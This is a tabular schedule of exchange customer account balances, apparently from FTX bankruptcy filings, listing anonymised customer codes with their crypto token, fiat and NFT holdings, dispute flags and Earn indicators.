| 07399385 | | BAT[0.00204617], DOGE[.0003926], ETH[0], ETHW[0.00001670], GRT[0.00026382], LINK[0.00001671], LTC[.00000573], PAXG[0], SOL[0], TRX[0], UNI[0.00003279], USD[0.00], USDT[0.00000001] | Yes | |
| 07399388 | | BRZ[1], CUSDT[4], TRX[1], USD[0.01] | Yes | |
| 07399391 | | BCH[.00000121], BTC[.01053466], DOGE[719.34917921], ETH[.00620989], ETHW[.00612775], KSHIB[175.14957106], TRX[1], USD[0.00] | Yes | |
| 07399397 | | USD[0.00], USDT[0] | Yes | |
| 07399405 | | ETH[.00000001], UNI[0] | | |
| 07399409 | | CUSDT[2], DOGE[36.26616307], USD[0.20] | | |
| 07399410 | | BRZ[1], CUSDT[1], SUSHI[1], USD[0.00] | | |
| 07399414 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07399417 | | BTC[.00488338], SHIB[1], USD[0.00] | | |
| 07399418 | | TRX[699.3], USD[7.40] | | |
| 07399420 | | DOGE[0], ETH[0], USD[0.01] | | |
| 07399422 | | ALGO[83.28104552], AVAX[.15840492], BAT[1.0165555], BCH[.14232563], BRZ[1], CUSDT[27], DOGE[1595.53423782], ETH[.00251844], ETHW[.00249106], GRT[100.07779192], KSHIB[388.4425164], LINK[13.33865767], LTC[.04396276], MATIC[106.30158339], NFT [520763384950635685/Eibit Ape #3761][1], SHIB[5750856.62460403], SOL[2.26116017], SUSHI[3.25148023], TRX[887.63161997], UNI[.17439788], USD[3.33], USDT[2.15517471] | Yes | |
| 07399423 | | BTC[.0000967], CUSDT[2], DOGE[1], ETH[.01404869], ETHW[.01404869], TRX[377.76369273], USD[0.00], YFI[.00520262] | | |
| 07399429 | | USD[0.00] | Yes | |
| 07399430 | | BAT[1.0165555], BRZ[1], CUSDT[11], DOGE[.01926936], TRX[7], USD[0.01] | Yes | |
| 07399434 | | DOGE[185.89889925], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07399435 | | TRX[2], USD[0.00] | | |
| 07399438 | | BTC[0], ETH[0], ETHW[0], GRT[0], USD[2.90] | | |
| 07399439 | | BAT[1], BRZ[5], CUSDT[18], DOGE[14], GRT[1], LINK[8.01798753], SHIB[1], SUSHI[9.06115809], TRX[11], USD[0.01], USDT[0.00000001] | | |
| 07399441 | | CUSDT[3], DOGE[573.11150542], USD[0.00] | | |
| 07399455 | | BRZ[1], CUSDT[1], SUSHI[138.16087557], USD[0.00] | | |
| 07399458 | | TRX[3.0000212], USD[0.00] | | |
| 07399464 | | USD[0.00] | | |
| 07399470 | | DAI[0], ETH[0], SUSHI[1.80509273], USD[0.00] | | |
| 07399474 | | BAT[1.0165555], BRZ[1], CUSDT[5], DAI[0], DOGE[1756.84408916], SHIB[6871514.27307033], TRX[0], USD[0.00] | Yes | |
| 07399477 | | CUSDT[1], TRX[.00191998], USD[0.00] | Yes | |
| 07399480 | | DOGE[1], USD[0.87] | | |
| 07399501 | | BAT[1.0165555], CUSDT[1], DOGE[3.000548], TRX[711.62573338], USD[0.00] | Yes | |
| 07399504 | | BCH[0.16318843], BRZ[1], CUSDT[633.69259073], DOGE[127.81646093], TRX[2], USD[0.01], USDT[0] | | |
| 07399509 | | CUSDT[3], DOGE[.00001029], LINK[1.00235361], TRX[383.83637343], USD[63.43] | | |
| 07399511 | | BAT[1], BRZ[9.52065817], BTC[.00002306], CUSDT[88.32323478], DOGE[1.28212963], GRT[2.00498957], SHIB[38296814.6633061], TRX[55.08893559], USD[0.00], USDT[0.00000001] | Yes | |
| 07399518 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07399521 | | BTC[.00023019], CUSDT[3], DOGE[2170.87184320], TRX[2], USD[0.00], YFI[.00089594] | | |
| 07399522 | Contingent, Disputed | USD[0.00] | Yes | |
| 07399549 | | BTC[.00006928], USD[0.94] | | |
| 07399555 | | BAT[9.85076285], CUSDT[4690.67305183], DOGE[2535.55672545], ETH[.22800791], ETHW[.22800791], GRT[18.37565082], LINK[2.77452053], LTC[1.00042908], SHIB[4921086.83896750], SUSHI[4.13710017], TRX[106.56099852], USD[0.00], USDT[29.82923923] | | |
| 07399560 | | CUSDT[574.47860543], DOGE[359.45338727], GRT[23.63886402], USD[0.00] | Yes | |
| 07399565 | | BTC[.70069309], ETH[16.85650833], ETHW[16.85650833], LINK[422.5032], USD[0.01], USDT[0] | | |
| 07399571 | | CUSDT[8], TRX[2], USD[0.00], USDT[0] | | |
| 07399580 | | BRZ[1], DOGE[2], USD[0.01] | | |
| 07399586 | | BAT[0], BCH[0], BTC[0], CUSDT[1], DOGE[0], LINK[0], SOL[0], TRX[0], USD[0.00] | | |
| 07399607 | | BCH[0], BRZ[.975], BTC[0], CUSDT[.996], DOGE[0], ETH[0], GRT[0], SOL[0], SUSHI[0], UNI[0.16733269], USD[1.00], USDT[0.00000001] | | |
| 07399609 | | BRZ[1], BTC[.07688277], CUSDT[9], DOGE[11.7720585], ETH[.14398637], ETHW[.14308378], TRX[5], USD[0.00] | | |
| 07399618 | | BRZ[2], CUSDT[7868.56436872], DAI[10.94629907], DOGE[8695.94858688], ETH[.28419234], ETHW[.28399535], LTC[.02430952], SHIB[7463161.39890426], SOL[2.21981683], TRX[464.94723622], UNI[2.18952761], USD[14.89], USDT[22.00423897] | Yes | |
| 07399622 | | CUSDT[2], SHIB[.18700949], USD[0.01], USDT[0.00000001] | Yes | |
| 07399624 | | BAT[0], BRZ[1], CUSDT[10], TRX[2.01823250], USD[0.00] | Yes | |
| 07399628 | | ETH[.00030712], ETHW[0.00030712], USD[0.03], USDT[0.14357280] | | |
| 07399631 | | CUSDT[1], DOGE[1], SHIB[1115487.31887721], USD[0.00] | Yes | |
| 07399644 | | BAT[1.01655549], BRZ[1], CUSDT[1], DOGE[7228.66517671], GRT[1.00325643], TRX[8.00087675], UNI[1.09874983], USD[0.00], USDT[0] | Yes | |
| 07399647 | | ETH[.323], ETHW[.323], USD[2.70] | | |
| 07399651 | | CUSDT[2], DOGE[3676.34802101], GRT[607.63925674], USD[0.31] | Yes | |
| 07399654 | | USD[0.31] | | |
| 07399659 | | CUSDT[2], DOGE[249.99249584], SHIB[387891.69869743], USD[0.00] | Yes | |
| 07399670 | | USD[10.52] | | |
| 07399673 | | BTC[.00010078], DOGE[184.64250717], LINK[.16184618], USD[0.00] | | |
| 07399676 | | USD[0.00], USDT[0] | | |
| 07399680 | | AAVE[2.3536511], BRZ[5.02660006], BTC[.0396068], CUSDT[37], DAI[.00000001], DOGE[2.00637202], ETH[.65655299], ETHW[0.62029384], GRT[413.81975006], LINK[1.957857], LTC[1.83139195], MATIC[1.00362422], MKR[.19509717], SHIB[13.06673328], SUSHI[53.34986475], TRX[18.12852894], UNI[15.69237956], USD[0.00], USDT[1.07762297], YFI[.01562794] | Yes | |
| 07399683 | | USD[0.60] | Yes | |
| 07399684 | | TRX[.000005], USD[0.00], USDT[.009195] | | |
| 07399686 | | CUSDT[1], DOGE[1995.25968195], ETH[0.34746447], ETHW[0.34731865], TRX[1133.31556718], USD[0.00] | Yes | |
| 07399687 | Contingent, Disputed | BAT[1], CUSDT[5], USD[0.00] | | |
| 07399692 | | BRZ[2], BTC[.03372495], CUSDT[8], DOGE[18.78913723], ETH[.15584182], ETHW[.15515312], GRT[2.61297639], LINK[1.24668111], SHIB[35640.24141514], TRX[5], USD[1033.87] | Yes | |
| 07399694 | | DOGE[0], USD[0.87], USDT[0] | Yes | |
| 07399697 | | BAT[2.13247621], BRZ[6.44516271], BTC[0], CUSDT[27], DOGE[18.73953795], ETH[0], LINK[0], NFT (390984396457014686/Serum Surfers X Crypto Bahamas #17)[1], SOL[0], SUSHI[0], TRX[6], USD[0.00], USDT[0.000018941] | Yes | |
| 07399698 | | CUSDT[1], DOGE[1], SOL[12.80271761], TRX[1949.65256216], USD[400.00] | | |
| 07399703 | | AVAX[0], BTC[0], ETH[0], LINK[0], SOL[0.00214654], USD[0.00000001], YFI[0] | | |
| 07399706 | | BAT[.00144188], BRZ[2], CUSDT[67.7033944], DOGE[11.78407765], ETH[.07411914], ETHW[.07319888], SHIB[7], USD[0.00] | Yes | |
| 07399708 | | BTC[.00115305], CUSDT[7], SHIB[1], SOL[1.32698793], USD[1.73] | Yes | |
| 07399710 | | USD[0.00], USDT[0] | | |
| 07399718 | | BRZ[1], CUSDT[2], DOGE[1], SUSHI[1.83808472], TRX[1214.01711797], USD[0.00] | Yes | |
| 07399719 | | ETH[1.017], USD[1673.64] | | |
| 07399722 | | ETH[.000083], ETHW[.000083], LINK[.0068], USD[0.01], USDT[.315506] | | |
| 07399723 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07399729 | | BTC[0], ETH[0], USD[0.00] | | |
| 07399730 | Contingent, Disputed | DOGE[0], ETH[0], ETHW[0], GRT[0], SHIB[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07399731 | | BRZ[1], DOGE[9985.54535999], GRT[1], SUSHI[23.34688359], USD[117.00] | | |
| 07399732 | | CUSDT[1], UNI[10.16663074], USD[800.00] | | |
| 07399733 | | BTC[.00019013], DOGE[2], ETH[.01644215], ETHW[.01644215], TRX[183.93344993], USD[0.00] | | |
| 07399740 | | USD[0.01] | Yes | |
| 07399745 | | CUSDT[143.94376393], DOGE[4], USD[776.54] | | |
| 07399746 | | ETHW[.69864144], USD[1.73], USDT[0] | | |
| 07399752 | | USD[4511.18] | | |
| 07399753 | | CUSDT[6], DOGE[0.00001478], ETH[0], USD[0.31] | Yes | |
| 07399757 | | ETH[1.44469919], ETHW[1.44469919], USD[0.09] | | |
| 07399763 | | BRZ[1], LINK[.00065945], USD[0.00] | Yes | |
| 07399767 | | BRZ[1], DOGE[1], SHIB[1], USD[0.00] | | |
| 07399769 | | DOGE[776.28866245], USD[0.01] | | |
| 07399770 | | NFT (303440270367411503/FTX - Off The Grid Miami #1185)[1], NFT (382790381769669809/FTX Crypto Cup 2022 Key #89)[1], NFT (398713579087070714/Austria Ticket Stub #126)[1], NFT (418559896917396460/Montreal Ticket Stub #250)[1], NFT (429485060005645952/Hungary Ticket Stub #184)[1], NFT (520783818075770899/Entrance Voucher #2866)[1] | | |
| 07399773 | | CUSDT[2], DOGE[8.99820438], TRX[1], USD[0.00] | Yes | |
| 07399778 | | CUSDT[3], DOGE[98.50752051], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07399788 | | AVAX[6.71251905], BRZ[7.39454026], CUSDT[16], DOGE[2], GRT[3.08471738], SHIB[3], TRX[1], USD[0.00], USDT[5.36058383], YFI[.081614] | Yes | |
| 07399791 | | DOGE[.42475359], USD[0.00] | | |
| 07399794 | | TRX[1], USD[0.00] | | |
| 07399795 | | USD[0.00] | | |
| 07399797 | | SHIB[2], USD[437.18] | Yes | |
| 07399799 | | BRZ[3], DOGE[2], ETHW[0], SHIB[12], TRX[1], USD[0.00] | Yes | |
| 07399800 | | BRZ[1], TRX[1], USD[102.87] | | |
| 07399802 | | BCH[0], BTC[0], CUSDT[6], DAI[0], DOGE[0], ETH[0], GRT[.00028305], LINK[.00000749], MATIC[.00013398], SOL[0], SUSHI[0], USD[0.00] | Yes | |
| 07399811 | | BRZ[2], CUSDT[8], DOGE[0], TRX[6], USD[0.00], USDT[0] | Yes | |
| 07399813 | | NFT (333365605550321406/FTX Crypto Cup 2022 Key #2475)[1], NFT (423016089788638996/Humpty Dumpty #327)[1], NFT (439454237826909417/The Hill by FTX #1203)[1], NFT (453585877159155236/Romeo #2661)[1], NFT (551593839883448802/Entrance Voucher #1734)[1], USD[0.44] | Yes | |
| 07399820 | | CUSDT[19], TRX[2], USD[0.00] | Yes | |
| 07399825 | | BTC[0], CUSDT[1], DOGE[0], ETH[0], TRX[4], USD[0.00] | | |
| 07399826 | | CUSDT[27], DOGE[633.77238856], SHIB[113.26412957], USD[0.00] | Yes | |
| 07399831 | | BCH[0], BRZ[0], BTC[0], CUSDT[0], DAI[0], DOGE[0], ETH[0], LINK[0], PAXG[0], SOL[0], USD[0.01], USDT[0] | Yes | |
| 07399834 | | SHIB[1], USD[0.00] | Yes | |
| 07399840 | | BTC[0.60620033], ETH[4.10849383], ETHW[3.85773228], NFT (548490779397690657/Humpty Dumpty #718)[1], USD[0.00] | | |
| 07399843 | | CUSDT[1], SUSHI[.00001791], USD[0.00] | Yes | |
| 07399848 | | CUSDT[6], LTC[0], SOL[1.11943549], TRX[1], USD[0.00] | Yes | |
| 07399850 | | USD[0.00], USDT[0] | | |
| 07399854 | | CUSDT[1], DOGE[1], ETH[0], TRX[0], USD[0.00] | | |
| 07399856 | | BRZ[1], CUSDT[15], DOGE[4810.47062586], SHIB[5], TRX[5], USD[0.00] | Yes | |
| 07399857 | | BTC[0.00020000], SOL[11.84390848], USD[1.34], USDT[5.2403488] | | |
| 07399858 | | BAT[2.09937287], BF_POINT[300], CUSDT[2], DOGE[2], ETH[5.67035027], ETHW[5.66791696], SOL[1.09256462], TRX[1], USD[23.52], USDT[1.09126739] | Yes | |
| 07399863 | | CUSDT[12], DOGE[1], GRT[1], TRX[7], USD[5457.44], USDT[0] | Yes | |
| 07399871 | | USD[0.00], USDT[0] | | |
| 07399874 | | AVAX[2.06821856], BAT[43.33180140], BRZ[2], DOGE[3939.49381304], ETH[0], ETHW[0], GRT[232.28644973], KSHIB[2906.36809731], LINK[5.00988094], MATIC[47.94126258], NEAR[1.55556540], SHIB[323731687.13626830], SOL[1.86253248], SUSHI[22.31996995], TRX[770.01628154], UNI[8.47462042], USD[0.00], USDT[0] | Yes | |
| 07399875 | | CUSDT[1], USD[0.00] | | |
| 07399884 | | CUSDT[3], DOGE[.01128153], USD[0.00] | Yes | |
| 07399888 | | BTC[0], CUSDT[3], TRX[2], USD[0.00] | | |
| 07399889 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07399895 | | AUD[2.54], BTC[.00009108], CAD[2.42], CUSDT[71.25047102], DOGE[140.46827199], ETH[.00107722], ETHW[.00107722], EUR[2.04], GBP[1.77], LTC[.00985288], PAXG[.00055186], SGD[2.63], SOL[.08718482], TRX[21.86301451], USD[0.41] | | |
| 07399899 | | BTC[0], DOGE[1], USD[0.00] | | |
| 07399900 | | USD[0.00], USDT[0.00018078] | | |
| 07399909 | | USD[0.00] | | |
| 07399926 | | BTC[0], USD[0.00] | | |
| 07399927 | | BAT[0], CUSDT[5], DOGE[3], LINK[0], SHIB[3572949.95089323], SOL[0], TRX[1], USD[0.00] | | |
| 07399932 | | AAVE[1.89802035], BAT[.61], BRZ[1], CUSDT[1], DAI[.2122095], DOGE[1], ETH[0.00000009], ETHW[5.58084719], SHIB[3], SOL[0.00000001], TRX[1], UNI[.02937599], USD[0.00], USDT[0.00107761] | Yes | |
| 07399936 | | BCH[0], BTC[0], DOGE[1.00003670], ETH[0], LTC[0], SOL[0], TRX[0], USD[0.00] | | |
| 07399939 | | BCH[.06984499], CUSDT[1], DOGE[1], ETH[.02537485], ETHW[.02537485], GRT[4.61884411], USD[90.00] | | |
| 07399940 | | BAT[1.01655549], BRZ[1], CUSDT[38], DOGE[1], ETH[0], ETHW[0], LTC[0], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07399941 | | BRZ[3], CUSDT[3], DOGE[4], TRX[1], USD[0.26], USDT[2] | | |
| 07399943 | | AAVE[.00000805], AUD[1.27], BAT[.95965526], BCH[.00000433], BRZ[5.49205911], BTC[.00000081], CAD[1.25], CUSDT[49.33803999], DAI[.98857823], DOGE[4.53183042], ETH[.00000441], ETHW[.00000441], EUR[0.82], GBP[0.71], GRT[.00841196], LINK[.0000062], LTC[.00000693], MATIC[.05307309], MKR[.00000595], PAXG[.00116644], SGD[1.32], SOL[.00907194], SUSHI[.00201818], TRX[6.85659228], UNI[.00003332], USD[0.00], USDT[.99470558], YFI[.00000293] | | |
| 07399945 | | CUSDT[2], DOGE[1], SOL[0], TRX[2], USD[0.00] | Yes | |
| 07399948 | | BRZ[2], BTC[0], CUSDT[9], DOGE[433.08263617], ETH[.00000001], ETHW[0], GRT[1.00404471], KSHIB[0], SHIB[6], TRX[3], USD[4.44] | Yes | |
| 07399950 | | BRZ[1], TRX[1], USD[687.21], USDT[0] | | |
| 07399957 | | TRX[958.041], USD[0.08] | | |
| 07399958 | | BTC[.00196411], TRX[1], USD[0.00] | | |
| 07399960 | | SOL[.00245436], UNI[.037792], USD[0.87] | | |
| 07399961 | | USD[100.00] | | |
| 07399967 | | BTC[0], ETH[0], GRT[.1512], NFT [38262609550673428S/Entrance Voucher #4173][1], SOL[0], USD[0.31], USDT[0.00000001] | | |
| 07399968 | | USD[0.04], USDT[0] | | |
| 07399975 | | CUSDT[2.00634280], DOGE[595.31304319], TRX[0.00115390], USD[0.00], USDT[0] | Yes | |
| 07399978 | | BTC[0.00315916], DOGE[0], SOL[.009] | | |
| 07399979 | | CUSDT[423.27269843], DOGE[.00002297], SHIB[31314420.29301761], TRX[3961.18523364], USD[8.29] | Yes | |
| 07399984 | | BTC[0], ETH[0], SOL[0], USD[0.00], USDT[0] | | |
| 07399986 | | BCH[0], BRZ[0.00000031], BTC[0], DOGE[0.00001453], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0.00000688], UNI[0], USD[0.00], USDT[0.00000001] | | |
| 07399989 | | CUSDT[1], DOGE[0], TRX[1], USD[0.22] | | |
| 07399995 | | USD[0.01] | | |
| 07399998 | | MATIC[10], USD[271.87] | | |
| 07400000 | | BAT[1.00433225], BRZ[2], BTC[0], CUSDT[154.47968235], DOGE[8.00575537], ETHW[0.00000416], LTC[0], MATIC[0], NEAR[0], NFT [321068991485490987/Imola Ticket Stub #1360][1], SHIB[34], SOL[0], TRX[1], USD[0.00], USDT[1.02543198], YFI[0] | Yes | |
| 07400008 | | USD[0.00] | | |
| 07400010 | | GRT[1.00498957], SOL[27.10119833], USD[0.00], USDT[1.08404864] | Yes | |
| 07400012 | | DOGE[599.20413618], SHIB[211728.42234878], USD[0.00] | Yes | |
| 07400014 | | BTC[.00000052], USD[0.00], USDT[0] | | |
| 07400023 | | SUSHI[94], USD[4.59] | | |
| 07400028 | | SOL[0.00494939], USD[0.00], USDT[0.00000104] | | |
| 07400030 | | BF_POINT[100], DOGE[9.19339012], ETH[0.00108107], ETHW[0], GRT[1], SHIB[9], TRX[3], USD[0.02], USDT[1.02543198] | Yes | |
| 07400035 | | TRX[4.98], USD[0.02] | | |
| 07400037 | | BTC[.00065336], DAI[10.90904409], DOGE[167.58564081], LTC[.03105977], SOL[1.99516583], TRX[1], USD[0.00] | | |
| 07400039 | | CUSDT[1], DOGE[2], GRT[1], USD[0.00] | | |
| 07400043 | | BTC[.0039778], DOGE[302.24797715], ETH[.14122673], ETHW[.14122673], LTC[.19133014], TRX[1], USD[0.00] | | |
| 07400050 | | MATIC[168.13732652], USD[0.00] | | |
| 07400062 | | BTC[0.00006930], LTC[0], NFT [464398641015199206/Entrance Voucher #2797][1], UNI[.00000001], USD[0.01], USDT[0.00555300], YFI[0] | | |
| 07400064 | | BTC[0], ETHW[.00031435], USD[0.00], USDT[0], WBTC[0] | | |
| 07400067 | Contingent, Disputed | BRZ[2], CUSDT[1], GRT[1], TRX[188.03796945], USD[0.00] | | |
| 07400071 | | DOGE[0], ETH[0], LINK[0], LTC[0], SOL[0], SUSHI[0], USD[0.00] | | |
| 07400082 | | BTC[0], LTC[139.40428154], NFT [348076418698353369/Saudi Arabia Ticket Stub #262][1], USD[2.01] | | |
| 07400100 | | BAT[0], DOGE[3], LINK[.9455825], TRX[0], USDT[0.00000029] | Yes | |
| 07400101 | | BRZ[1], CUSDT[1.01450672], DOGE[10143.57242598], TRX[1.68033061], USD[0.53], USDT[1] | | |
| 07400102 | | BRZ[4], BTC[.00854132], CUSDT[24], DOGE[6.04709822], ETH[.39589905], ETHW[.39573284], SOL[47.77696939], TRX[7], USD[0.00] | Yes | |
| 07400104 | | USD[0.01] | | |
| 07400106 | | CUSDT[6], TRX[48.02851007], USD[0.00] | | |
| 07400115 | | BAT[1.01655549], BRZ[3], CUSDT[12], DOGE[1], SHIB[248.62894127], TRX[4], USD[0.00], USDT[2.15105864] | | |
| 07400119 | | DOGE[939.65841786], USD[0.00] | | |
| 07400120 | | CUSDT[1], DOGE[1], TRX[3191.95047264], USD[0.00], USDT[0] | | |
| 07400125 | | BTC[0.00000577], ETH[0], GRT[50.07586292], USD[0.00], YFI[0] | | |
| 07400126 | | CUSDT[5], DOGE[2367.52862501], ETH[.01656827], ETHW[.01636307], TRX[1], USD[0.00] | Yes | |
| 07400129 | | DOGE[.02503888], TRX[1], USD[0.00] | | |
| 07400131 | | BRZ[21.43850755], CUSDT[12.00161965], DOGE[.85241353], SOL[.00001496], TRX[.95906528], USD[0.03] | Yes | |
| 07400133 | | BRZ[7.31018815], CUSDT[6], SHIB[1], TRX[3], USD[0.01] | Yes | |
| 07400134 | | CUSDT[1], DOGE[262.29894851], USD[0.00] | | |
| 07400144 | | DOGE[7], GRT[.00005124], USD[0.01], USDT[0.00000001] | | |
| 07400151 | | BAT[88.12163132], BCH[.30232583], BRZ[1093.8399274], CAD[137.62], CUSDT[3083.41459388], DAI[22.70597165], DOGE[4042.89816831], ETH[.01221612], ETHW[.01206553], EUR[16.66], GBP[110.99], GRT[114.10390382], KSHIB[2412.96330407], LINK[6.01301816], MATIC[246.84597358], SHIB[5576769.84873645], SOL[29.03035746], SUSHI[97.62627171], TRX[1787.7738213], UNI[10.97361084], USD[17.41], USDT[20.13263650] | Yes | |
| 07400156 | | USD[18.19], USDT[.00251761] | | |
| 07400163 | | BTC[0.00000305], SOL[0], SUSHI[.2835], USD[1.11], USDT[1.98891461] | | |
| 07400166 | | BRZ[2], BTC[.08570731], CUSDT[2], DOGE[2], GRT[3.18454879], TRX[2], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07400167 | | CUSDT[1], DOGE[8166.3053662], USD[0.00], USDT[1] | | |
| 07400170 | | BTC[.00955163], CUSDT[4], DOGE[12281.76931839], ETH[.52138527], ETHW[.52138527], LTC[1.04990242], SUSHI[31.96789198], TRX[1], UNI[13.72862203], USD[0.00], USDT[1], YFI[.02603699] | | |
| 07400172 | | BTC[.0000966], SOL[00474815], USD[2.10] | | |
| 07400173 | | BTC[0.00046205], CUSDT[1], ETH[.00054282], SHIB[74573.15610192], USD[0.00] | Yes | |
| 07400176 | | CUSDT[2], DOGE[178.46820832], USD[60.00] | | |
| 07400179 | | BTC[0.02478826], CUSDT[1], ETH[.00191863], ETHW[.00189127], NFT (360690607324843278/FTX - Off The Grid Miami #808)[1], NFT (383100215565651137/Entrance Voucher #2868)[1], NFT (523653567302432433/FTX - Off The Grid Miami #152)[1], NFT (524109319675052075/FTX - Off The Grid Miami #2456)[1], USD[0.00] | Yes | |
| 07400183 | | BTC[.0000768], DOGE[.32968817], TRX[.16613005], USD[0.00], USDT[0.00000001] | | |
| 07400190 | | BAT[.86], DOGE[.205], GRT[.0804], NFT (322047374649090101/FTX - Off The Grid Miami #1375)[1], SUSHI[.4411], USD[0.01] | | |
| 07400196 | | ETH[.00003901], ETHW[.00003901], USD[0.00] | | |
| 07400200 | | DOGE[2], SUSHI[5.95051508], TRX[1], USD[0.00] | Yes | |
| 07400201 | | BTC [.0400609], USD[30.33] | | |
| 07400214 | | BRZ[2], CUSDT[4], DOGE[417.62401681], TRX[3387.59107516], USD[33.59], USDT[0] | | |
| 07400226 | | BTC[.21097693], ETH[.56631294], ETHW[.56607512], LINK[61.11978972] | Yes | |
| 07400227 | | SHIB[33144.45022384], USD[0.00] | Yes | |
| 07400233 | | CUSDT[2], DOGE[.00001083], TRX[.00005218], USD[0.00] | | |
| 07400234 | | AAVE[3.74625], BTC[.08006842], ETH[1.40576147], ETHW[1.40576147], GRT[462.90953013], LINK[115.46849156], SOL[4.70753908], SUSHI[356.643], USD[380.97], YFI[.01278683] | | |
| 07400237 | | BTC[.05716043], ETH[1.311], ETHW[1.311], USD[3.41] | | |
| 07400238 | | BTC[0.00590532], DOGE[69.31295878], ETH[0], SOL[0], USD[0.00] | | |
| 07400244 | | BTC[0], DOGE[2], TRX[1], USD[130.33], USDT[0] | | |
| 07400248 | | BTC[.0022864], DOGE[1], USD[0.00] | | |
| 07400252 | | BTC[.02729844], CUSDT[1], DOGE[1419.54521432], GRT[1.00498957], TRX[1], USD[0.00] | Yes | |
| 07400253 | | BAT[1], BRZ[2], CUSDT[3], TRX[2], USD[0.01] | | |
| 07400255 | | CUSDT[1], DOGE[153.58590135], USD[0.00] | | |
| 07400259 | | DOGE[1], USD[0.00] | | |
| 07400261 | | DOGE[33.25350241] | | |
| 07400279 | | BRZ[1], TRX[1], USD[0.00] | | |
| 07400290 | | CUSDT[1], ETH[.00206269], ETHW[.00203533], LTC[0], USD[0.00] | Yes | |
| 07400293 | | DOGE[0], ETH[0], USD[0.00] | | |
| 07400295 | | BRZ[1], CUSDT[3], TRX[3], USD[0.01] | | |
| 07400303 | | DOGE[10204.785], USD[1480.06], USDT[498.1992] | | |
| 07400310 | | USD[10.00] | | |
| 07400313 | | CUSDT[1], DOGE[1], ETHW[.000056], SHIB[3], TRX[1], USD[0.00] | Yes | |
| 07400317 | | LINK[.01673868], SOL[0.00498828], USD[0.01] | | |
| 07400331 | | DOGE[1788.47417526], TRX[4064.41489349], USD[0.00] | | |
| 07400334 | | ETHW[105.008992] | | |
| 07400344 | | SOL[.00783091], USD[1177.57], USDT[0.00000032] | | |
| 07400354 | | CUSDT[7], USD[0.01] | | |
| 07400362 | | BRZ[1], CUSDT[8], DOGE[1], ETH[.09323856], ETHW[.09323856], LTC[.47326695], TRX[2], USD[0.00] | | |
| 07400371 | | BAT[1.00667916], CUSDT[2], DOGE[1], SOL[70.32385636], USD[0.01], USDT[1.01913967] | Yes | |
| 07400381 | | DOGE[1], ETH[0], USD[0.01] | | |
| 07400382 | | GRT[0], USD[0.04], USDT[0.00074856] | Yes | |
| 07400393 | | BRZ[1], DOGE[2.00853716], USD[0.00] | | |
| 07400395 | | DOGE[224.15545324], USD[0.00] | | |
| 07400402 | | DOGE[1], GRT[115.8172686], USD[0.00] | | |
| 07400406 | | DOGE[10545.6909458], USD[0.00] | Yes | |
| 07400416 | | BTC[1.9005], SOL[1747.5], USD[46158.44] | | |
| 07400423 | | BAT[1.01552979], BRZ[3], CUSDT[8], GRT[1.00458561], MATIC[.01683845], SOL[0], USD[0.00] | Yes | |
| 07400426 | | TRX[0], USD[0.00], USDT[0.06728446] | | |
| 07400435 | | BAT[3271.63916663], BRZ[1], BTC[.5649967], CUSDT[1], DOGE[6452.6338138], ETH[.28798798], ETHW[.28781877], NFT (53607637225378536/Nike love )[1], SHIB[91809330.2962845], SOL[34.49949315], USD[0.00], YFI[.15553706] | Yes | |
| 07400442 | | ETH[.117882], ETHW[.117882], NFT (485057832009701269/Reflection '10 #32 (Redeemed))[1], SOL[.21555665], USD[3.40] | | |
| 07400443 | | BRZ[1], CUSDT[2], DOGE[4], ETH[.04821133], ETHW[.04821133], USD[486.00], USDT[2] | | |
| 07400444 | | BTC[0], SHIB[199800], USD[0.27], USDT[0] | | |
| 07400461 | | BAT[2], BCH[.99008593], CUSDT[1], DOGE[1536.58868678], ETH[1.63386367], ETHW[1.63386367], TRX[1], USD[0.01], USDT[1] | | |
| 07400464 | | BTC[0.00008296], ETH[.0002314], ETHW[.0002314], SUSHI[.0226], UNI[.04115], USD[0.01], USDT[0] | | |
| 07400472 | | BAT[.0000463], BRZ[4], CUSDT[12], DOGE[5], ETH[0], GRT[1], SHIB[1], TRX[0], USD[0.04], USDT[1.06642448] | Yes | |
| 07400475 | Contingent, Disputed | BTC[0], CUSDT[0], ETH[0], LTC[0], PAXG[0], UNI[0], USD[0.00] | | |
| 07400477 | | CUSDT[1], DOGE[1057.9460456], ETH[.01246704], ETHW[.01246704], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07400499 | | CUSDT[28], DOGE[0], ETH[0], NFT (296419927346108063/Bevel Boy #010 )[1], NFT (355125938239254251/#35 Fast Food Donald)[1], NFT (360594103584191776/Rocky FMS)[1], NFT (362654163800017021/The Cowgirl)[1], NFT (400452343330977812/Nespace Album #15)[1], NFT (411514069088035540/Man  #4)[1], NFT (414691582972910096/5D PIG 08)[1], NFT (426380167406142780/#29 MTG-Crazy)[1], NFT (442091609112571607/Game #3)[1], NFT (510286083169212929/Usual Suspects)[1], NFT (511423125120602950/5D PIG 03)[1], NFT (519055021399759264/Game #1)[1], NFT (544327136548390634/#33 Weekend Ted)[1], NFT (552294791012659038/#22 Lord Stone)[1], NFT (565543415440586458/The American Dream)[1], NFT (572280293276751789/Bevel Boy #037 - Death Row)[1], SHIB[1], SOL[0], TRX[49.95996225], USD[0.00] | Yes | |
| 07400500 | | USD[0.00] | | |
| 07400504 | | DOGE[.00617364], USD[0.00] | Yes | |
| 07400510 | | SUSHI[4.37002657], USD[0.00] | | |
